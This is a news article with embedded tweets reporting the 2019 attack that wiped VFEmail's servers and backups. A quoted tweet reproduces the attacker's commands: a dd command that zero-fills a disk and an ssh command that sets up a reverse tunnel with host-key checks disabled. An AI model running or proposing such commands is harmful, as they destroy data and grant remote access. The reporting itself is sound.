Email provider VFEmail said it has suffered a catastrophic destruction of all of its servers by an unknown assailant who wiped out almost two decades’ worth of data and backups in a matter of hours.
“Yes, @VFEmail is effectively gone,” VFEmail founder Rick Romero wrote on Twitter Tuesday morning after watching someone methodically reformat hard drives of the service he started in 2001. “It will likely not return. I never thought anyone would care about my labor of love so much that they’d want to completely and thoroughly destroy it.”Ars Technica
Yes, @VFEmail is effectively gone. It will likely not return.
I never thought anyone would care about my labor of love so much that they’d want to completely and thoroughly destroy it.827:23 AM – Feb 12, 2019Twitter Ads info and privacy76 people are talking about this
The ordeal started on Monday when he noticed all the servers for his service were down. A few hours later, VFEmail’s Twitter account reported the attacker “just formatted everything.” The account went on to report that VFEmail “caught the perp in the middle of formatting the backup server.”
Caught the perp in the middle of formatting the backup server:
dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559
via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null email@example.com -R 127.0.0.1:30081:127.0.0.1:22 -N2791:09 PM – Feb 11, 2019Twitter Ads info and privacy149 people are talking about this
The damage, Romero reported, extended to VFEmail’s “entire infrastructure,” including mail hosts, virtual machine hosts, and a SQL server cluster. The extent of the damage, he suggested, required the hacker to have multiple passwords. “That’s the scary part.”
Someone hacked a mail server and formatted every server including backups.
Not ‘A’, an entire infrastructure.
Mail hasts, VM hosts,sql server cluster, hosted vms.
If they all had one password, sure, but they didn’t. That’s the scary part.117:32 AM – Feb 12, 2019Twitter Ads info and privacySee Havokmon’s other Tweets
At the time this post was going live, a status page reported that VFEmail was now delivering email again, although it wasn’t clear if service was working for US-based accounts. The page also said that subfolders and filters users had previously set up were no longer in place. Users of free accounts shouldn’t yet send email, and no one should use email clients.
The motivation for the attack wasn’t immediately clear. Most highly destructive attacks in recent years have been part of ransomware rackets that threaten people with catastrophic data loss unless they make big cryptocurrency payments. But sometimes, targets don’t see the ransom messages. It’s also possible that VFEmail fell victim to some sort of personal grudge. Romero didn’t respond to messages seeking comment for this post.
A Web cache shows that VFEmail was founded in 2001 in response to the ILOVEYOU virus that infected tens of millions of Windows computers all around the world a year earlier. The virus got its name because it was transmitted in emails with the subject “I love you.” The service aimed to offer a better email experience by scanning messages for malware on the server.
“We strive to build an economical and redundant system, to provide our users with as much uptime as possible,” VFEmail’s about page said. “As mentioned, VFEmail started with a single machine, but over time we’ve built out, adding systems for load balancing/failover and separating services. Most recently we’ve made use of Virtual Machines in order to keep hardware acquisitions at a minumum [sic], in those cases where it would not impact performance. By separating vital functions, upgrades, updates, and system problems can quickly and easily be isolated from the rest of the system and provide you with uninterrupted accessibility.”
The status page said the destruction came at the hands of a “hacker, last seen as firstname.lastname@example.org.” The IP address, whois records show, has ties to both Daticum and Coolbox hosting services, both in Bulgaria.
“That ip is a VM host,” Romero tweeted. “Feels like a launch pad to me. To reformat a sql cluster (whaa?), and hit off-site NL hosted vms at the same time seems pretty nefarious to me.”
Thanks for the background man! This is scary stuff, tracking the ip it looks like from Bulgaria. Do you suspect revenge or someone trying to hide something more malicious?
That ip is a VM host. Feels like a launch pad to me.
To reformat a sql cluster (whaa?), and hit off-site NL hosted vms at the same time seems pretty nefarious to me.27:38 AM – Feb 12, 2019Twitter Ads info and privacySee Havokmon’s other Tweets
He went on to say that the attacker used multiple means of access onto the VFEmail infrastructure and as a result, it wasn’t clear two-factor authentication would have stopped the intrusion.
“2FA only works if the access method was via authentication, as opposed to exploit,” he explained. “At least 3 different methods had to be used to get into everything.”